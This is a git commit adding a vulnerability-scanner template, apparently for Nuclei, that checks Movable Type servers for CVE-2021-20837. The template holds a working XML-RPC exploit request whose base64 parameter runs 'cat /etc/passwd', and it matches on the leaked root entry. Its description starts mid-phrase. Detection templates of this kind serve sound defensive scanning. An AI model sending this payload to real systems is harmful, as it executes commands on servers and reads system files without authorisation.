Create CVE-2021-20837.yaml

2021-10-29 18:13:32 +05:30 · 2021-10-29 18:13:32 +05:30 · afbd8f0448
parent 80484df046
commit afbd8f0448
1 changed files with 39 additions and 0 deletions
--- a/cves/2021/CVE-2021-20837.yaml
+++ b/cves/2021/CVE-2021-20837.yaml
@ -0,0 +1,39 @@
+id: CVE-2021-20837
+
+info:
+  name: CVE-2021-20837
+  author: dhiyaneshDK
+  severity: high
+  description: 5002 and earlier (Movable Type Advanced 7 Series), Movable Type Advanced 6.8. 2 and earlier (Movable Type Advanced 6 Series), Movable Type Premium 1.46 and earlier, and Movable Type Premium Advanced 1.46 and earlier allow remote attackers to execute arbitrary OS commands via unspecified vectors.
+  reference:
+    - https://github.com/ghost-nemesis/cve-2021-20837-poc
+    - https://twitter.com/cyber_advising/status/1454051725904580608/photo/1
+
+  tags: cve,cve2021,lfi,rce,misconfig
+
+requests:
+  - raw:
+      - |
+        POST /cgi-bin/mt/mt-xmlrpc.cgi
+        Host: {{Hostname}}
+        Content-Type: text/xml
+
+    <?xml version="1.0" encoding="UTF-8"?>
+    <methodCall>
+      <methodName>mt.handler_to_coderef</methodName>
+      <params>
+        <param>
+          <value>
+            <base64>
+              YGNhdCAvZXRjL3Bhc3N3ZGA=
+            </base64>
+          </value>
+        </param>
+      </params>
+    </methodCall>
+    matchers-condition: or
+    matchers:
+
+      - type: regex
+        regex:
+          - "root:.*:0:0"